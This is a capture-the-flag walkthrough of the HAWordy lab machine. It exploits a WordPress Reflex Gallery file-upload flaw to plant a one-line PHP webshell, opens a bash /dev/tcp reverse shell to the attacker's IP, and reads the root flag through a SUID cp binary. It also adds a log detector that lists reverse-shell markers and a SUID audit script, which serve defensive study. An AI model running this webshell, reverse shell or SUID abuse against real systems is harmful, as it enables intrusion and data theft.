[Offensive Security] Proving Grounds - HAWordy
https://portal.offensive-security.com/proving-grounds/play https://www.vulnhub.com/entry/ha-wordy,363/
A beginner machine with multiple paths. Only local.txt and proof.txt are valid flags.
Footprint
Open ports
Nmap scan:
kali@kali:~$ sudo nmap -sS -Pn -v10 -p- -oA syn_full 192.168.207.23
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 63
NSE scan:
kali@kali:~$ sudo nmap -sC -sV -p$(grep -oP '^\d*(?=/)(?=.* open )' syn_full.nmap |sort -u |tr '\n' ',' |grep -oP '.*(?=,)') -Pn -v10 -sF -oA vuln
PORT STATE SERVICE REASON VERSION
80/tcp open http tcp-response Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
HTTP
ffuf can be used to enumerate the web server's resources:
kali@kali:~$ for w in /usr/share/seclists/Discovery/Web-Content/common.txt /usr/share/seclists/Discovery/Web-Content/raft-large-files-lowercase.txt; do ffuf -v -c -u http://192.168.207.23/FUZZ -t 50 -w $w -fs 0; done
"http://192.168.207.23/index.html"
"http://192.168.207.23/info.php"
"http://192.168.207.23/javascript"
"http://192.168.207.23/notes.txt"
"http://192.168.207.23/wordpress"
Let's look at notes.txt and info.php:
>>>
GET /notes.txt HTTP/1.1
Host: 192.168.207.23
<<<
You Need to ZIP Your Wayout
>>>
GET /info.php HTTP/1.1
Host: 192.168.207.23
<<<
192.168.207.23
Nothing really interesting.
Reflex Gallery plugin
A WordPress scan shows that the Reflex Gallery plugin is outdated:
kali@kali:~$ wpscan --url http://192.168.207.23/wordpress/
[+] reflex-gallery
| Location: http://192.168.207.23/wordpress/wp-content/plugins/reflex-gallery/
| Last Updated: 2021-03-10T02:38:00.000Z
| [!] The version is out of date, the latest version is 3.1.7
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 3.1.3 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.207.23/wordpress/wp-content/plugins/reflex-gallery/readme.txt
And this plugin might be vulnerable to arbitrary file upload:
kali@kali:~$ searchsploit wordpress reflex gallery
WordPress Plugin Reflex Gallery - Arbitrary File Upload (Metasploit) | php/remote/36809.rb
WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload | php/webapps/36374.txt
kali@kali:~$ searchsploit -x php/webapps/36374.txt
# Path : wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
# add Month and Year in GET for Folder of Shell ./wp-content/uploads/" .$_GET['Year'].'/'.$_GET['Month']. "
# Exploit :
Vulnerable File : php.php
50. if(!move_uploaded_file($_FILES['qqfile']['tmp_name'], $path)){
173. $result = $uploader->handleUpload('../../../../../uploads/'.$_GET['Year'].'/'.$_GET['Month'].'/');
<form method="POST" action="http://127.0.0.1:1337/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2015&Month=03" enctype="multipart/form-data" >
<input type="file" name="qqfile"><br>
<input type="submit" name="Submit" value="Pwn!">
</form>
Knowing that the uploaded files are saved under 192.168.207.23/wordpress/wp-content/uploads/ in a Year/Month subfolder taken from the GET parameters, we can host the following page locally:
<form method="POST" action="http://192.168.207.23/wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2022&Month=03" enctype="multipart/form-data" >
<input type="file" name="qqfile"><br>
<input type="submit" name="Submit" value="Pwn!">
</form>
Open it:
kali@kali:~$ php -S 127.0.0.1:48080
kali@kali:~$ firefox http://127.0.0.1:48080/reflex_gallery.html
And upload a webshell:
kali@kali:~$ cat webshell.php
<?php echo system($_GET['c'])?>
This gives us RCE on the server:
>>>
GET /wordpress/wp-content/uploads/2022/03/webshell.php?c=id HTTP/1.1
Host: 192.168.207.23
<<<
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Reverse shelled :]
kali@kali:~$ nc -nlvp 48888
listening on [any] 48888 ...
kali@kali:~$ curl "http://192.168.207.23/wordpress/wp-content/uploads/2022/03/webshell.php?c=bash+-c+'bash+-i+>%26+/dev/tcp/192.168.49.207/48888+0>%261'"
connect to [192.168.49.207] from (UNKNOWN) [192.168.207.23] 59574
bash: cannot set terminal process group (777): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/wordpress/wp-content/uploads/2022/03$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
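From the defender's side, the whole chain above leaves a very recognisable trail in the Apache access log: a POST to the plugin's FileUploader/php.php endpoint, followed by requests for a .php file under wp-content/uploads/, and finally a query string carrying a reverse-shell one-liner. The following detector is an added example written for this write-up, not code from the original post or from the Reflex Gallery project; the log lines are constructed for the example (they reuse the IPs and the 2022/03 upload folder from the write-up), and the rule names and shell markers are choices made here.

```python
"""Spot the upload-then-execute pattern of the Reflex Gallery abuse in Apache logs.

Added example: scans Combined Log Format lines for three signals
  1. plugin_upload_endpoint  - POST to reflex-gallery/.../FileUploader/php.php
  2. php_exec_in_uploads     - a PHP-like file served from wp-content/uploads/
  3. reverse_shell_payload   - a decoded query string with a shell one-liner
"""
import re
from collections import Counter, namedtuple
from urllib.parse import unquote_plus

# Combined Log Format prefix: ip ident user [ts] "METHOD target proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

UPLOADER_PATH = "/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php"
# .php, .php5, .phtml, .phar: anything Apache may hand to the PHP handler
PHP_EXT_RE = re.compile(r"\.ph(p\d?|tml|ar)$", re.IGNORECASE)
# Assumed marker list; extend with whatever your environment sees
SHELL_MARKERS = ("/dev/tcp/", "bash -i", "nc -e", "python -c")

Finding = namedtuple("Finding", "ip ts rule target")


def parse_line(line):
    """Return the named groups of a log line, or None if it is not CLF."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Return the list of rule names a parsed entry triggers."""
    path, _, query = entry["target"].partition("?")
    decoded_query = unquote_plus(query)  # %26 -> &, + -> space
    rules = []
    if entry["method"] == "POST" and path.endswith(UPLOADER_PATH):
        rules.append("plugin_upload_endpoint")
    if "/wp-content/uploads/" in path and PHP_EXT_RE.search(path):
        rules.append("php_exec_in_uploads")
    if any(marker in decoded_query for marker in SHELL_MARKERS):
        rules.append("reverse_shell_payload")
    return rules


def scan(lines):
    """Run every line through the rules and collect the findings."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        for rule in classify(entry):
            findings.append(Finding(entry["ip"], entry["ts"], rule, entry["target"]))
    return findings


def summarize(findings):
    """Count findings per rule, as a plain dict."""
    return dict(Counter(f.rule for f in findings))


# Constructed sample log: one benign page view, the upload, a webshell probe,
# the reverse-shell trigger, and a benign image request.
SAMPLE_LOG = """
192.168.49.207 - - [30/Mar/2022:11:20:01 +0000] "GET /wordpress/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.168.49.207 - - [30/Mar/2022:11:21:10 +0000] "POST /wordpress/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2022&Month=03 HTTP/1.1" 200 45 "http://127.0.0.1:48080/reflex_gallery.html" "Mozilla/5.0"
192.168.49.207 - - [30/Mar/2022:11:21:35 +0000] "GET /wordpress/wp-content/uploads/2022/03/webshell.php?c=id HTTP/1.1" 200 54 "-" "curl/7.74.0"
192.168.49.207 - - [30/Mar/2022:11:22:02 +0000] "GET /wordpress/wp-content/uploads/2022/03/webshell.php?c=bash+-c+'bash+-i+>%26+/dev/tcp/192.168.49.207/48888+0>%261' HTTP/1.1" 200 0 "-" "curl/7.74.0"
10.0.0.5 - - [30/Mar/2022:11:23:00 +0000] "GET /wordpress/wp-content/uploads/2022/03/photo.jpg HTTP/1.1" 200 81234 "-" "Mozilla/5.0"
""".strip().splitlines()

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ts} {f.ip} {f.rule}: {f.target}")
    print(summarize(scan(SAMPLE_LOG)))
```

The second rule is the one worth alerting on regardless of plugin: nothing under wp-content/uploads/ should ever be executed as PHP, so a single hit there is a strong signal even without the upload POST in front of it.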
Privilege Escalation
local.txt
The user flag is readable by anyone in raj's home folder:
www-data@ubuntu:/$ ls -la /home/raj
-rw------- 1 raj raj 6678 Jul 22 2020 .ICEauthority
-rw------- 1 raj raj 3 Jul 22 2020 .bash_history
-rw-r--r-- 1 raj raj 220 Sep 8 2019 .bash_logout
-rw-r--r-- 1 raj raj 3771 Sep 8 2019 .bashrc
drwx------ 17 raj raj 4096 Sep 9 2019 .cache
drwx------ 15 raj raj 4096 Sep 9 2019 .config
drwx------ 3 root root 4096 Sep 9 2019 .dbus
drwx------ 3 raj raj 4096 Sep 9 2019 .gnupg
drwx------ 2 root root 4096 Sep 9 2019 .gvfs
drwx------ 3 raj raj 4096 Sep 8 2019 .local
drwx------ 5 raj raj 4096 Sep 8 2019 .mozilla
-rw------- 1 root root 39 Sep 9 2019 .mysql_history
-rw-r--r-- 1 raj raj 807 Sep 8 2019 .profile
drwx------ 2 raj raj 4096 Sep 9 2019 .ssh
-rw-r--r-- 1 raj raj 0 Feb 21 2020 .sudo_as_admin_successful
drwxr-xr-x 2 raj raj 4096 Sep 9 2019 Desktop
drwxr-xr-x 2 raj raj 4096 Sep 8 2019 Documents
drwxr-xr-x 2 raj raj 4096 Sep 9 2019 Downloads
drwxr-xr-x 2 raj raj 4096 Sep 8 2019 Music
drwxr-xr-x 2 raj raj 4096 Sep 8 2019 Pictures
drwxr-xr-x 2 raj raj 4096 Sep 8 2019 Public
drwxr-xr-x 2 raj raj 4096 Sep 8 2019 Templates
drwxr-xr-x 2 raj raj 4096 Sep 8 2019 Videos
-rw-r--r-- 1 raj raj 8980 Sep 8 2019 examples.desktop
-rw-r--r-- 1 www-data www-data 32 Jul 13 2020 flag1.txt
-rw-r--r-- 1 raj raj 33 Mar 30 11:13 local.txt
drwxr-xr-x 2 root root 4096 Sep 9 2019 plugin
www-data@ubuntu:/$ cat /home/raj/flag1.txt
Your flag is in another file...
www-data@ubuntu:/$ cat /home/raj/local.txt
20[...]50
proof.txt
The root flag is pretty straightforward as well. We need to exploit the cp command, as its SUID bit is set:
www-data@ubuntu:/$ find / -perm -u=s -type f -print 2>/dev/null
/usr/sbin/pppd
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/arping
/usr/bin/wget
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/traceroute6.iputils
/usr/bin/gpasswd
/usr/bin/vmware-user-suid-wrapper
/usr/lib/xorg/Xorg.wrap
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/bin/fusermount
/bin/umount
/bin/mount
/bin/ping
/bin/cp
/bin/su
www-data@ubuntu:/tmp$ LFILE=/root/proof.txt
www-data@ubuntu:/tmp$ cp "$LFILE" proof.txt && cat proof.txt
6d[...]58
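The root path works only because /bin/cp carries a SUID bit that stock Ubuntu never sets on it (the same find listing shows /usr/bin/wget in that state too). An administrator can catch this class of misconfiguration by diffing the SUID binaries on a host against an expected baseline. The audit below is an added example, not part of the original write-up: the baseline is an assumed allow-list of binaries that normally carry SUID on Ubuntu 18.04 and should be adjusted per distribution, collect_suid() gathers live data, and the sample entries are constructed to mirror the listing above.

```python
"""Audit set-user-ID binaries against an expected baseline.

Added example: takes (path, mode, uid) triples, either from collect_suid()
on a live host or from constructed data, and reports every SUID file that is
outside the baseline or not owned by root, with the one-line remediation.
"""
import os
import stat
from collections import namedtuple

Finding = namedtuple("Finding", "path reason fix")

# Assumed baseline (not an authoritative distribution manifest): binaries
# that legitimately need SUID on a stock Ubuntu 18.04 install.
BASELINE_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/pkexec",
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping", "/bin/fusermount",
}


def collect_suid(root="/"):
    """Walk the filesystem and yield (path, mode, uid) for each SUID regular file."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path, st.st_mode, st.st_uid


def audit_suid(entries, baseline=BASELINE_SUID):
    """Return a Finding for every SUID entry that needs a second look."""
    findings = []
    for path, mode, uid in entries:
        if not mode & stat.S_ISUID:
            continue  # not SUID at all, nothing to review
        fix = f"chmod u-s {path}"
        if uid != 0:
            # SUID to a non-root account still grants that account's rights
            findings.append(Finding(path, "suid_but_not_root_owned", fix))
        elif path not in baseline:
            # The HAWordy case: cp/wget SUID root let www-data read /root
            findings.append(Finding(path, "suid_root_outside_baseline", fix))
    return findings


# Constructed sample entries modelled on the write-up's find output.
# 0o104755 = regular file, SUID, rwxr-xr-x; 0o100755 = same without SUID.
SAMPLE_ENTRIES = [
    ("/usr/bin/passwd", 0o104755, 0),     # expected SUID root
    ("/bin/su", 0o104755, 0),             # expected SUID root
    ("/bin/cp", 0o104755, 0),             # unexpected: copies root-only files for any user
    ("/usr/bin/wget", 0o104755, 0),       # unexpected
    ("/bin/ls", 0o100755, 0),             # not SUID, ignored
    ("/opt/app/helper", 0o104755, 1000),  # hypothetical: SUID but owned by uid 1000
]

if __name__ == "__main__":
    for f in audit_suid(SAMPLE_ENTRIES):
        print(f"{f.reason:28} {f.path:20} -> {f.fix}")
```

On a real host, run audit_suid(collect_suid()) as root and feed the result into whatever alerting you use; a baseline captured right after provisioning is a better allow-list than a hand-written one.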
Even if we didn't list the /root files, we know the root flag is in proof.txt, as the lab's description says: Only local.txt and proof.txt are valid flags.